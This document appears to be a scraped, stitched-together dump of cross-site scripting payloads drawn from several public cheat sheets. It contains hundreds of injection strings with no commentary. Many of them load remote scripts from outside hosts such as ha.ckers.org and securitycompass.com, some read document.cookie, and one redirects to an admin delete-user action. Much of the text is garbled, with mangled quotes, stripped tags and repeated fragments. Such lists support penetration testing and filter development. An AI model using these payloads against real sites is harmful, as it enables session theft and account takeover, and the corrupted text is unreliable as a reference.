1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? 
echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] “;>;; ;;alert(1); ; ;alert(1); ; perl -e 'print \”;;\”;;' >; out perl -e 'print \”;;alert(\”;XSS\”;);\”;;' >; out “>alert(‘XSS’) XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))> XSS STYLE=xss:e/**/xpression(alert(‘XSS’))> >”>alert(“XSS”)& “>@import”javascript:alert(‘XSS’)”; >”‘> >%22%27> ‘%uff1cscript%uff1ealert(‘XSS’)%uff1c/script%uff1e’ ”;!–“= <IMG SRC=JaVaScRiPt:alert("XSS")> <IMGSRC=java&#115;crip&#116;:ale&#114;t('X&#83;S'&#41> <IMGSRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert(‘XSS’);”> <IMG SRC="jav ascript:alert(‘XSS’);”> <![CDATA[var n=0;while(true){n++;}]]> 
<![CDATA[SCRIPT]]>alert(‘gotcha’);<![CDATA[/SCRIPT]]> <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; <!DOCTYPE foo []>&xee; alert(‘XSS’) %3cscript%3ealert(‘XSS’)%3c/script%3e %22%3e%3cscript%3ealert(‘XSS’)%3c/script%3e alert(“XSS”)”> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) =(◕_◕)=" title="+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101)) ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“=0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” xxs link xxs link alert(“XSS”)”> <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? 
<IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(‘XSS’); alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS 0\”autofocus/onfocus=alert(1)–>”-confirm(3)-” veris–>group element[attribute=’ [
[” onmouseover=”alert(‘RVRSH3LL_XSS’);” ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; alert;pg(“XSS”) for((i)in(self))eval(i)(1) <script>alert(1)</script><script>alert(1)</script> <sCRiPt>alert(1)</SCrIPt> test %253Cscript%253Ealert(‘XSS’)%253C%252Fscript%253E <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; “>”>123 “>123 “>123 “>alert(`TEXT YOU WANT TO BE DISPLAYED`);123 “>123 >Hover the cursor to the LEFT of this Message&ParamHeight=250 “>”>123 “>123 <iframe src=http://xss.rocks/scriptlet.html < {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> <script xlink:href=data&colon;,window.open('https://www.google.com/') </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ 
\u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) \x3Cscript>javascript:alert(1) ‘”`>/* *\x2Fjavascript:alert(1)// */ javascript:alert(1)</script\x0D javascript:alert(1)</script\x0A javascript:alert(1)</script\x0B javascript:alert(1) <!–\x3E –> –> –> –> –> –> `”‘> test “‘`>a=’hello\x27;javascript:alert(1)//'; test test test test test test test test test test test test test test /* *\x2A/javascript:alert(1)// */ /* *\x00/javascript:alert(1)// */ </style\x3E </style\x0D </style\x09 </style\x20 </style\x0A “‘`>ABCDEF “‘`>ABCDEF if(“x\\xE1\x96\x89″.length==2) { javascript:alert(1);} if(“x\\xE0\xB9\x92″.length==2) { javascript:alert(1);} if(“x\\xEE\xA9\x93″.length==2) { javascript:alert(1);} ‘`”>javascript:alert(1) ‘`”>javascript:alert(1) “‘`> “‘`> javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); javascript:alert(1); ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF ABCDEF test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test test `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> “`’>\x3Bjavascript:alert(1) “`’>\x0Djavascript:alert(1) “`’>\xEF\xBB\xBFjavascript:alert(1) 
“`’>\xE2\x80\x81javascript:alert(1) “`’>\xE2\x80\x84javascript:alert(1) “`’>\xE3\x80\x80javascript:alert(1) “`’>\x09javascript:alert(1) “`’>\xE2\x80\x89javascript:alert(1) “`’>\xE2\x80\x85javascript:alert(1) “`’>\xE2\x80\x88javascript:alert(1) “`’>\x00javascript:alert(1) “`’>\xE2\x80\xA8javascript:alert(1) “`’>\xE2\x80\x8Ajavascript:alert(1) “`’>\xE1\x9A\x80javascript:alert(1) “`’>\x0Cjavascript:alert(1) “`’>\x2Bjavascript:alert(1) “`’>\xF0\x90\x96\x9Ajavascript:alert(1) “`’>-javascript:alert(1) “`’>\x0Ajavascript:alert(1) “`’>\xE2\x80\xAFjavascript:alert(1) “`’>\x7Ejavascript:alert(1) “`’>\xE2\x80\x87javascript:alert(1) “`’>\xE2\x81\x9Fjavascript:alert(1) “`’>\xE2\x80\xA9javascript:alert(1) “`’>\xC2\x85javascript:alert(1) “`’>\xEF\xBF\xAEjavascript:alert(1) “`’>\xE2\x80\x83javascript:alert(1) “`’>\xE2\x80\x8Bjavascript:alert(1) “`’>\xEF\xBF\xBEjavascript:alert(1) “`’>\xE2\x80\x80javascript:alert(1) “`’>\x21javascript:alert(1) “`’>\xE2\x80\x82javascript:alert(1) “`’>\xE2\x80\x86javascript:alert(1) “`’>\xE1\xA0\x8Ejavascript:alert(1) “`’>\x0Bjavascript:alert(1) “`’>\x20javascript:alert(1) “`’>\xC2\xA0javascript:alert(1) “/> “/> “/> “/> “/> “/> “/> “/> “/> javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) javascript:alert(1) “> “> “> “> “> “> “> “> “> “> “> “> “> “> “> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> `”‘> javascript:alert(1) <video poster=javascript:javascript:alert(1)// …………… X X CLICKME CLICKME <!– <img src=" <img src=" XXX javascript:alert(1) <b alert(1)0 document.getElementById(“div2″).innerHTML = document.getElementById(“div1″).innerHTML; x javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)”> javascript:alert(1)’>”> javascript:alert(1)”> javascript:alert(1)”> d.innerHTML=d.innerHTML XXX <img src="x` `javascript:alert(1)”` `> “> <!–[if –> X p[foo=bar{}*{-o-link:’javascript:javascript:alert(1)’}{}*{-o-link-source:current}]{color:red}; <link rel=stylesheet 
href=data:,*%7bx:expression(javascript:alert(1))%7d @import “data:,*%7bx:expression(javascript:alert(1))%7D”; XXXXXX *[{}@import’%(css)s?]X XXX XXX *{x:expression(javascript:alert(1))} X X with(document.getElementById(“d”))innerHTML=innerHTML X X XXX #x{font-family:foo[bar;color:green;} #y];color:red;{} XXX ({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval ({0:#0=eval/#0#/#0#(javascript:alert(1))}) ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)() &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&& ¼script¾javascript:alert(1)¼/script¾ X 1 1 1 XXX x %(payload)s javascript:alert(1) <SCRIPT SRC=%(jscript)s? <%(payload)s//< <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < @import’%(css)s'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> li {list-style-image: url(“javascript:javascript:alert(1)”);}XSS javascript:alert(1); .XSS{background-image:url(“javascript:javascript:alert(1)”);} BODY{background:url(“javascript:javascript:alert(1)”)} XSS”””,”XML namespace.”),(“””<IMG SRC=”javascript:javascript:alert(1)”> +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- X @import’%(css)s'; a{background:url(‘s1′ ‘s2)}@import javascript:javascript:alert(1);’);} &&javascript:alert(1)&&;&& javascript:alert(1); <![CDATA[<IMG SRC="javas]]]] test1 test1 <embed width=500 height=500 code="data:text/html,%(payload)s”> “> ‘;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//– >”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= xxs link xxs link alert(“XSS”)”> perl -e ‘print “”;’ > out <alert(“XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? 
<IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// alert(“XSS”); li {list-style-image: url(“javascript:alert(‘XSS’)”);}XSS @import’http://ha.ckers.org/xss.css'; <META HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss”)} @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* alert(‘XSS’); .XSS{background-image:url(“javascript:alert(‘XSS’)”);} BODY{background:url(“javascript:alert(‘XSS’)”)} BODY{background:url(“javascript:alert(‘XSS’)”)} ¼script¾alert(¢XSS¢)¼/script¾ <!–#exec cmd="/bin/echo ' <? echo('alert(“XSS”)’); ?> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=alert(‘XSS’)”> +ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=“ onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=“&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? 
/**/alert(1)/**/</script /**/ "> <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me ”;!–“=’>//\\,”>”>”*” ‘); alert(‘XSS alert(1); alert(‘XSS’); alert(“XSS”)”> <script>alert(‘XSS’);</script> alert(String.fromCharCode(88,83,83)) @im\port’\ja\vasc\ript:alert(\”XSS\”)'; <? 
echo('alert(\”XSS\”)’); ?> alert(‘XSS’) “>alert(0) alert(/xss/) alert(/xss/) alert(‘XSS’) window.alert(“Bonjour !”); <iframe onload=alert(‘XSS’)> “><script alert(String.fromCharCode(88,83,83)) ‘>>XSS ‘”>>alert(‘XSS’) ‘”>>XSS var var = 1; alert(var) BODY{background:url(“javascript:alert(‘XSS’)”)} <?='alert(“XSS”)’?> ” onfocus=alert(document.domain) “> <" li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}XSS perl -e ‘print \”alert(\”XSS\”)\”;’ > out perl -e ‘print \”\”;’ > out alert(1) alert(1) “> [color=red width=expression(alert(123))][color] Execute(MsgBox(chr(88)&chr(83)&chr(83)))alert(123) ‘”>alert(1111) ‘”>alert(document.cookie) ‘””> alert(‘X \nS \nS’); <<<>>><<alert(123) (123)(123) ‘>alert(123) ‘>”> }a=eval;b=alert;a(b(/XSS/.source)); document.write(“XSS”); a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d); =’>alert(“xss”) “+src=”http://yoursite.com/xss.js?69,69″> alert(navigator.userAgent)> “>/XaDoS/>alert(document.cookie) “>/KinG-InFeT.NeT/>alert(document.cookie) src=”http://www.site.com/XSS.js”> data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4= !–” />alert(‘xss’); alert(“XSS by \nxss”)XSS by xss “>alert(“XSS by \nxss”)>XSS by xss ‘”>alert(“XSS by \nxss”)>XSS by xss alert(“XSS by \nxss”)XSS by xss alert(1337)XSS by xss “>alert(1337)”>alert(“XSS by \nxss ‘”>alert(1337)>XSS by xss XSS by xss ‘>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83)); >”>alert(561177485777)%3B alert(“XSS”); ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!–"<XSS>=&{()} <SCRIPT>alert('XSS')</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <BASE HREF="javascript:alert('XSS');//"> <BGSOUND 
SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS');"> <BODY ONLOAD=alert('XSS')> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG DYNSRC="javascript:alert('XSS');"> <IMG LOWSRC="javascript:alert('XSS');"> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser exp/*<XSS STYLE='no\xss:noxss("*//*"); <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <IMG SRC="livescript:[code]"> %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IMG SRC="mocha:[code]"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <LINK REL="stylesheet" 
HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> <HTML xmlns:xss> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert('XSS')"></B></I></XML> <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> <HTML><BODY> <!–[if gte IE 4]> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!–#exec cmd="/bin/echo '<SCRIPT SRC'"–><!–#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"–> <? echo('<SCR)'; <BR SIZE="&{alert('XSS')}"> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert(“XSS”);</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav 
ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > perl -e 'print "<IMG SRC=javascript:alert("XSS")>";'> out perl -e 'print "&<SCRIPT>alert("XSS")</SCRIPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h tt p://6 6.000146.0×7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> document.vulnerable=true; <document.vulnerable=true;//< <script document.vulnerable=true; <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < a=/XSS/\ndocument.vulnerable=true; 
\”;document.vulnerable=true;;// document.vulnerable=true; li {list-style-image: url(“javascript:document.vulnerable=true;”);XSS 1script3document.vulnerable=true;1/script3 @im\port’\ja\vasc\ript:document.vulnerable=true'; exp/* document.vulnerable=true; .XSS{background-image:url(“javascript:document.vulnerable=true”);} BODY{background:url(“javascript:document.vulnerable=true”)} <![<IMG SRC="javas]]]] <IMG SRC="javascript:document.vulnerable=true”> <t:set attributeName="innerHTML" to="XSSdocument.vulnerable=true”> <? echo('document.vulnerable=true’); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=document.vulnerable=true”> +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- &document.vulnerable=true; <a href="about:document.vulnerable=true;”> document.vulnerable=true; <!–document.vulnerable=true;//–> <document.vulnerable=true; <![<!–]]document.vulnerable=true;//–> document.vulnerable=true; ” onmouseover=”document.vulnerable=true;”> document.vulnerable=true;; [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> @import’http://www.securitycompass.com/xss.css'; <meta HTTP-EQUIV="Link" Content="; REL=stylesheet”> BODY{-moz-binding:url(“http://www.securitycompass.com/xssmoz.xml#xss”)} XSS <!–#exec cmd="/bin/echo ' ” SRC=”http://www.securitycompass.com/xss.js”> ” SRC=”http://www.securitycompass.com/xss.js”> ” ” SRC=”http://www.securitycompass.com/xss.js”> ‘” SRC=”http://www.securitycompass.com/xss.js”> ` SRC=”http://www.securitycompass.com/xss.js”> ‘>” SRC=”http://www.securitycompass.com/xss.js”> document.write(“<SCRI");PT SRC=”http://www.securitycompass.com/xss.js”> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> 